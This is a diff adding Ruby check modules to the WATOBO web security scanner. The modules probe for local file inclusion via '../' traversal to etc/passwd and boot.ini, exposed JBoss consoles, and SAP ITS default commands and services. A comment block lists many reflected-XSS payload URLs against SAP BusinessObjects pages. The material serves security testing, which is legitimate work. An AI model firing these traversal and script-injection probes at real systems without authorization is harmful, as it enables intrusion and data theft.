watobo 0.9.8.677

data/modules/active/fileinclusion/lfi_simple.rb

@@ -0,0 +1,134 @@
+# .
+# lfi_simple.rb
+# 
+# Copyright 2012 by siberas, http://www.siberas.de
+# 
+# This file is part of WATOBO (Web Application Tool Box)
+#        http://watobo.sourceforge.com
+# 
+# WATOBO is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation version 2 of the License.
+# 
+# WATOBO is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with WATOBO; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+# .
+require 'digest/md5'
+require 'digest/sha1'
+
+module Watobo
+  module Modules
+    module Active
+      module Fileinclusion
+        
+        
+        class Lfi_simple < Watobo::ActiveCheck
+          
+          def initialize(project, prefs={})
+            super(project, prefs)
+            
+            @info.update(
+                         :check_name => 'Local File Inclusion',    # name of check which briefly describes functionality, will be used for tree and progress views
+            :description => "Checks for parameters, which can lead to local file inclusion.",   # description of checkfunction
+            :author => "Andreas Schmidt", # author of check
+            :check_group => AC_GROUP_FILE_INCLUSION,
+            :version => "1.0"   # check version
+            )
+            
+            @finding.update(
+                            :threat => 'Code Execution or Information Leakage',        # thread of vulnerability, e.g. loss of information
+            :class => "Local File Inclusion",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
+            :type => FINDING_TYPE_VULN         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN 
+            )
+            
+            @include_checks = [ 
+                                ["etc/passwd",'root:[^:]+:\w+:\w+' ],
+                                ["etc/passwd%00",'root:[^:]+:\w+:\w+' ],
+                                ["boot.ini", Regexp.quote('[boot loader]')],
+                                ["boot.ini%00", Regexp.quote('[boot loader]')]
+            ]
+            
+            @updirs = [0,5,10,15,20]
+            
+          end
+          
+          def generateChecks(chat)            
+            begin 
+              @updirs.each do |up|
+                @include_checks.each do |file, pattern|
+                  chat.request.get_parm_names.each do |parm|
+                    checker = proc{
+                      test_request = nil
+                      test_response = nil
+                      test = chat.copyRequest
+                      check = "../"*up + file
+                      test.replace_get_parm(parm, check)
+                      
+                      test_request,test_response = doRequest(test)           
+                      
+                      
+                    #  test_chat = Chat.new(test, test_response, chat.id)
+                      if test_response.join =~ /(#{pattern})/ # if default db found, check for content
+                        match = $1
+                        addFinding(test_request,test_response,
+                                   :check_pattern => "#{file}",
+                                   :test_item => parm,
+                        :proof_pattern => "#{match}",
+                        :chat => chat,
+                        :rating => VULN_RATING_HIGH,
+                        :title => "[#{parm}] - #{test_request.file}"
+                        )
+                        [ test_request, test_response ]
+                      end
+                    }
+                    yield checker
+                  end
+                  
+                  chat.request.post_parm_names.each do |parm|
+                    checker = proc{
+                      test_request = nil
+                      test_response = nil
+                      test = chat.copyRequest
+                      check = "../"*up + file
+                      test.replace_post_parm(parm, check)
+                      
+                      test_request,test_response = doRequest(test) 
+                    
+                      if test_response.join =~ /(#{pattern})/i # if default db found, check for content
+                        match = $1
+                        addFinding(test_request,test_response,
+                        :test_item => parm,
+                                   :check_pattern => "#{file}",
+                        :proof_pattern => "#{match}",
+                        :chat => chat,
+                        :rating => VULN_RATING_HIGH,
+                        :title => "[#{parm}] - #{file}"
+                        )
+                        [ test_request, test_response ]
+                      end
+                    }
+                    yield checker
+                  end
+                end
+              end
+            rescue => bang
+              puts bang
+              puts bang.backtrace if $DEBUG
+              puts "ERROR!! #{Module.nesting[0].name}"
+              raise
+            end
+            
+          end
+          
+        end
+        # --> eo namespace    
+      end
+    end
+  end
+end

data/modules/active/jboss/jboss_basic.rb

@@ -0,0 +1,119 @@
+# .
+# jboss_basic.rb
+# 
+# Copyright 2012 by siberas, http://www.siberas.de
+# 
+# This file is part of WATOBO (Web Application Tool Box)
+#        http://watobo.sourceforge.com
+# 
+# WATOBO is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation version 2 of the License.
+# 
+# WATOBO is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with WATOBO; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+# .
+module Watobo
+  module Modules
+    module Active
+      module Jboss
+        
+        
+        class Jboss_basic < Watobo::ActiveCheck
+          
+          def reset()
+            @checked_dirs.clear  
+          end
+          
+          def initialize(project, prefs={})
+            super(project, prefs)
+            @info.update(
+                         :check_name => 'Basic JBoss enumeration',    # name of check which briefly describes functionality, will be used for tree and progress views
+            :check_group => AC_GROUP_JBOSS,
+            :description => "Check every parameter for SQL-Injection flaws.",   # description of checkfunction
+            :author => "Andreas Schmidt", # author of check
+            :version => "0.9"   # check version
+            )
+            
+            
+            
+            @finding.update(
+                            :class => "JBoss-AS (critical)",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
+            :type => FINDING_TYPE_VULN         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
+            )
+            
+            measure = "Remove all unnecessary JBoss-Interfaces like JMX-Console."
+            
+            @jboss_checks = Hash.new
+            @jboss_checks["JBoss-AS (critical)"] = { :dirs => ['/jmx-console/HtmlAdaptor', '/web-console/Invoker', '/invoker/JMXInvokerServlet'],
+              :rating => VULN_RATING_CRITICAL,
+              :threat => "This server supports dangerous JBoss interfaces. An attacker can use these interfaces to gain control over system by deploying its own malicious servlets.",
+              :measure => measure
+            }
+
+            #
+            measure = "Disable all unneeded functions."                                                     
+            @jboss_checks["JBoss-AS (info)"] = { :dirs => [ '/status', '/web-console/ServerInfo.jsp'],
+              :rating => VULN_RATING_LOW,
+              :threat => "There are some functions enabled on this server which leads to information disclosure.
+An attacker can use these information to prepare more targeted attacks. ",
+              :measure => measure
+            }
+            
+            @checked_dirs = Hash.new
+          end
+          
+          def generateChecks(chat)            
+              chat.request.subDirs do |dir|
+                if not @checked_dirs.has_key?(dir)                  
+                  @checked_dirs[dir] = :checked
+                  @jboss_checks.each do |ckey, check_settings| 
+                    check_settings[:dirs].each do |cdir|
+                      checker = proc {
+                        check_dir = cdir
+                        test_request = nil
+                        test_response = nil
+                        # IMPORTANT!!!
+                        # use copyRequest(chat) for cloning the original request 
+                        test = chat.copyRequest
+                        puts "appending dir #{check_dir}"
+                        test.setDir(dir)
+                        test.appendDir(check_dir)
+                        
+                        #puts test
+                        
+                        status, test_request, test_response = fileExists?(test, :default => true)
+                        if status == true  
+                          #test_chat = Chat.new(test, test_response,chat.id)
+                         # resource = "/" + test_request.resource
+                          addFinding( test_request, test_response,
+                                     :check_pattern => "#{check_dir}",
+                                     :test_item => dir,
+                          :chat => chat,
+                          :title => "[#{check_dir}]",
+                          :rating => check_settings[:rating],
+                          :threat => check_settings[:threat],
+                          :measure => check_settings[:measure],
+                          :class => ckey
+                          )
+                        end
+                        
+                        [ test_request, test_response ]
+                      }
+                      yield checker
+                    end
+                  end
+                end  
+              end
+            end
+          end
+        end
+      end
+    end
+  end

data/modules/active/sap/business_objects.rb

@@ -0,0 +1,73 @@
+# .
+# business_objects.rb
+# 
+# Copyright 2012 by siberas, http://www.siberas.de
+# 
+# This file is part of WATOBO (Web Application Tool Box)
+#        http://watobo.sourceforge.com
+# 
+# WATOBO is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation version 2 of the License.
+# 
+# WATOBO is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with WATOBO; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+# .
+=begin
+http://www.example.com:8080/AdminTools/querybuilder/ie.jsp?ADD_RULE=1&AND_BTN=1&ATTRIBUTES_LIST=1&ATTRIBUTES_NOTES=1&ATTRIBUTES_PROMPT=1&BUILD_SQL_HEADER=1&BUILD_SQL_INSTRUCTION=1&EXIT=1&FINISH=1&FINISH_BTN=1&FINISH_HEADER=1&IETIPS=1&MUST_ANDOR_CLAUSES=1&MUST_SELECT_CLAUSES=1&NO_CLAUSES=1&NO_RULES=1&OR=1&OR_BTN=1&OTHER_RULE_HEADER=1&REMOVE=1&REMOVE_RULE_HEADER=1&RESET=1&RULE_HEADER=1&SELECT_SUBTITLE1=mr&SELECT_SUBTITLE2=mr&SELECT_SUBTITLE3=mr&SELECT_SUBTITLE4=mr&SPECIFY_ATTRIBUTES_PROMPT=1&SUBMIT=1&TITLE=mr&WELCOME_USER=1&framework=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:8080/AdminTools/querybuilder/logonform.jsp?APSNAME=Procheckup&AUTHENTICATION=1&LOGON=1&LOG_ON=1&NOTRECOGNIZED=1&PASSWORD=Pcu12U4&REENTER=1&TITLE=mr&UNSURE=1&USERNAME=Procheckup&WELCOME_LOGON=1&action=1&framework="><script>alert(1)</script>
+http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/apply.jsp?WOMdoc=1&WOMqueryAtt=1&WOMquerycontexts=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMunit=1&bodySel=1&capSel=1&colSel=1&compactSteps=1&currReportIdx=1&defaultName=Procheckup&docid=1&doctoken=1&dummy=1&isModified=1&lang="></script><script>alert(1)</script>&lastFormatZone=1&lastOptionZone=1&lastStepIndex=1&mode=1&rowSel=1&sectionSel=1&skin=1&topURL=1&unvid=1&viewType=1&xSel=1&ySel=1&zSel=1&
+http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/apply.jsp?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&
+http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>
+http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?lang="></script><script>alert(1)</script>
+http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang=1&mode=1&queryobjs=1&resetcontexts=1&scope=1&skin="></script><script>alert(1)</script>&unvid=1&
+http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?skin="></script><script>alert(1)</script>
+http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/turnto.jsp?WOMblock=1&WOMqueryAtt=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMturnTo=1&WOMunit=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>&skin=1&unit=1&
+http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/turnto.jsp?lang="></script><script>alert(1)</script>
+http://www.example.com:8080/CrystalReports/jsp/CrystalReport_View/viewReport.jsp?loc=//-->"></script><script>alert(1)</script>
+http://www.example.com:8080/InfoViewApp/jsp/common/actionNavFrame.jsp?url="></script><script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/scripts/docLoadUrl.jsp?url=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:6405/PerformanceManagement/scripts/docLoadUrl.jsp?url=�></script><script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/jsp/aa-display-flash.jsp?swf="><html><body><script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/jsp/alertcontrol.jsp?serSes=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:6405/PerformanceManagement/jsp/alertcontrol.jsp?serSes=�><script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
+http://www.example.com:6405/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="<~/XSS/*-*/STYLE=xss:e/**/xpression (location='http://www.procheckup.com')>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=http://www.procheckup.com&uid=1&variance=1&viewed=1&
+http://www.example.com:6405/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?flowid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&flowname=Procheckup&progtrend=1&viewed=1&
+http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=1&uid=1&variance=1&viewed=1&
+http://www.example.com:6405//PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&progtrend=1&progtrendImage=1&viewed=1&
+http://www.example.com:8080/PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-*/STYLE=xss:e/**/xpression(location='http://www.procheckup.com')>
+http://www.example.com:6405//PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-
+http://www.example.com:8080/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:6405/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:8080/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
+http://www.example.com:6405/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
+http://www.example.com:8080/PlatformServices/preferences.do?cafWebSesInit=true&service=<SCRIPT>alert(1)</SCRIPT>&actId=541&appKind=CMC  
+=end
+
+
+module Watobo
+  module Modules
+    module Active
+      module Sap
+        
+        
+        class Business_objects < Watobo::ActiveCheck
+          
+          def initialize(project, prefs={})
+           
+            super(project, prefs)
+          end
+        end
+        
+end
+end
+end
+end

data/modules/active/sap/its_commands.rb

@@ -0,0 +1,101 @@
+# .
+# its_commands.rb
+# 
+# Copyright 2012 by siberas, http://www.siberas.de
+# 
+# This file is part of WATOBO (Web Application Tool Box)
+#        http://watobo.sourceforge.com
+# 
+# WATOBO is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation version 2 of the License.
+# 
+# WATOBO is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with WATOBO; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+# .
+module Watobo
+  module Modules
+    module Active
+      module Sap
+        
+        
+        class Its_commands < Watobo::ActiveCheck
+          
+          def initialize(project, prefs={})
+           
+            super(project, prefs)
+            
+            
+            @info.update(
+                         :check_name => 'SAP ITS: Default Commands',    # name of check which briefly describes functionality, will be used for tree and progress views
+            :description => "Identifies vulnerable SAP ITS commands",   # description of checkfunction
+            :author => "Andreas Schmidt", # author of check
+            :version => "0.9",   # check version
+            :check_group => AC_GROUP_SAP
+            )
+            
+            @finding.update(
+                            :threat => 'Multiple',        # thread of vulnerability, e.g. loss of information
+            :class => "SAP ITS: Default Commands",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
+            :type => FINDING_TYPE_VULN         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN 
+            )
+            
+            # commands 2d array containing the command name and risk rating
+            @commands=[
+            ["AgateInstallCheck", VULN_RATING_LOW],
+            ["fieldDump", VULN_RATING_LOW],    
+            ]
+            
+          end
+          
+          def generateChecks(chat)
+            
+            begin
+              if chat.request.url =~ /\/wgate\/(\w*)\// then 
+                
+                @commands.each do |cmd, risk|
+                  checker = proc{
+                    test_request = nil
+                    test_response = nil
+                    test = chat.copyRequest
+                    test.add_get_parm("~command", "#{cmd.dup}")
+                    
+                    test_request,test_response = doRequest(test,:default => true)
+                    if test_response.status =~ /200/i then
+                      test_chat = Chat.new(test,test_response,chat.id)
+                      addFinding( test_request,test_response,
+                      :test_item => chat.request.url,
+                                 :check_pattern => "#{cmd.dup}",
+                      :proof_pattern => "#{test_response.status}",
+                      :chat => chat,
+                      :title => "#{cmd.dup}"
+                      )
+                      
+                      
+                    end
+                    [ test_request, test_response ]
+                  }
+                  yield checker
+                end
+              end            
+              
+            rescue => bang
+              puts bang
+              puts "ERROR!! #{Module.nesting[0].name}"
+              raise
+              
+            end
+          end
+          
+        end
+        # --> eo namespace    
+      end
+    end
+  end
+end

data/modules/active/sap/its_service_parameter.rb

@@ -0,0 +1,105 @@
+# .
+# its_service_parameter.rb
+# 
+# Copyright 2012 by siberas, http://www.siberas.de
+# 
+# This file is part of WATOBO (Web Application Tool Box)
+#        http://watobo.sourceforge.com
+# 
+# WATOBO is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation version 2 of the License.
+# 
+# WATOBO is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with WATOBO; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+# .
+require 'digest/md5'
+require 'digest/sha1'
+
+module Watobo
+  module Modules
+    module Active
+      module Sap
+        
+        
+        class Its_service_parameter < Watobo::ActiveCheck
+          
+          def initialize(project,prefs={})
+           
+            super(project, prefs)
+            
+            
+            @info.update(
+                         :check_name => 'SAP ITS: Service Parameters',    # name of check which briefly describes functionality, will be used for tree and progress views
+            :description => "Checks SAP ITS services for default parameters.",   # description of checkfunction
+            :author => "Andreas Schmidt", # author of check
+            :version => "0.9",   # check version
+            :check_group => AC_GROUP_SAP
+            )
+            
+            @finding.update(
+                            :threat => 'Information Disclosure (and maybe more)',        # thread of vulnerability, e.g. loss of information
+            :class => "SAP ITS: Service Parameters",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
+            :type => FINDING_TYPE_HINT         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN 
+            )
+            
+            @default_service_parameters = [
+            ["~command","AgateInstallCheck"],
+            ["~runtimeMode", "DM"], # Development Mode vs PM (Production Mode)
+            ["~forcetarget", "sap.com"], # forcetarget only in old (maybe buggy) its-systems supported
+            ["~exitURL", "www.sap.com"], # exitURL only in old (maybe buggy) its-systems supported
+            ]
+            
+          end
+          
+          def generateChecks(chat)
+            
+            begin
+              
+              if chat.request.url =~ /\/wgate\/(\w*)\/!?/ then
+                @default_service_parameters.each do |sp, val|
+                  checker = proc{
+                    test_request = nil
+                    test_response = nil
+                    test = chat.copyRequest
+                    service = "#{sp.dup}"
+                    sparm = "#{val.dup}"
+                    
+                    test.add_get_parm(service, sparm)
+                    
+                    test_request,test_response = doRequest(test,:default => true)
+                    
+                    if test_response.status =~ /200/i then
+                      test_chat = Chat.new(test,test_response,chat.id)
+                      addFinding( test_request,test_response,
+                      :test_item => chat.request.url,
+                                 :check_pattern => "#{sparm}",
+                      :proof_pattern => "#{test_response.status}",
+                      :chat => chat,
+                      :title => service
+                      )
+                      
+                    end
+                    [ test_request, test_response ]
+                  }
+                  yield checker
+                end            
+              end
+            rescue => bang
+              puts bang
+              puts "ERROR!! #{Module.nesting[0].name}"
+            end
+          end
+          
+        end
+        # --> eo namespace    
+      end
+    end
+  end
+end

data/modules/active/sap/its_services.rb

@@ -0,0 +1,103 @@
+# .
+# its_services.rb
+# 
+# Copyright 2012 by siberas, http://www.siberas.de
+# 
+# This file is part of WATOBO (Web Application Tool Box)
+#        http://watobo.sourceforge.com
+# 
+# WATOBO is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation version 2 of the License.
+# 
+# WATOBO is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with WATOBO; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+# .
+require 'digest/md5'
+require 'digest/sha1'
+
+module Watobo
+  module Modules
+    module Active
+      module Sap
+        
+        
+        class Its_services < Watobo::ActiveCheck
+          
+          def initialize(project, prefs={})
+          
+            super(project, prefs)
+            
+            
+            @info.update(
+                         :check_name => 'SAP ITS: Default Services',    # name of check which briefly describes functionality, will be used for tree and progress views
+            :description => "Checks SAP ITS System for enabled default services.",   # description of checkfunction
+            :author => "Andreas Schmidt", # author of check
+            :version => "0.9",   # check version
+            :check_group => AC_GROUP_SAP
+            )
+            
+            @finding.update(
+                            :threat => 'Information Disclosure (and maybe more)',        # thread of vulnerability, e.g. loss of information
+            :class => "SAP ITS: Default Services",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
+            :type => FINDING_TYPE_HINT         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN 
+            )
+            
+            @its_services = [ 
+                  "admin", 
+                  "webgui", 
+                  "systeminfo",
+            ]
+          end
+          
+          def generateChecks(chat)
+            
+            begin
+              
+              if chat.request.url =~ /\/wgate\/(\w*\/!?)/ then
+                service_name = $1
+                @its_services.each do |service|
+                  checker = proc{
+                    test_request = nil
+                    test_response = nil
+                    c_service = "#{service.dup}"
+                    c_srv_name = "#{service_name}"
+                    test = chat.copyRequest
+                    test.first.gsub!(c_srv_name, "#{c_service}/!")                
+                    
+                    test_request,test_response = doRequest(test, :default => true)
+                    
+                    
+                    if test_response.status =~ /200/i then
+                      #test_chat = Chat.new(test,test_response,chat.id)
+                      addFinding( test_request,test_response,
+                      :test_item => chat.request.url,
+                                 :check_pattern => "#{c_service}",
+                      :proof_pattern => "#{test_response.status}",
+                      :chat => chat,
+                      :title => c_service
+                      )
+                    end
+                    [ test_request, test_response ]
+                  }
+                  yield checker
+                end            
+              end
+            rescue => bang
+              puts bang
+              puts "ERROR!! #{Module.nesting[0].name}"
+            end
+          end
+          
+        end
+        # --> eo namespace    
+      end
+    end
+  end
+end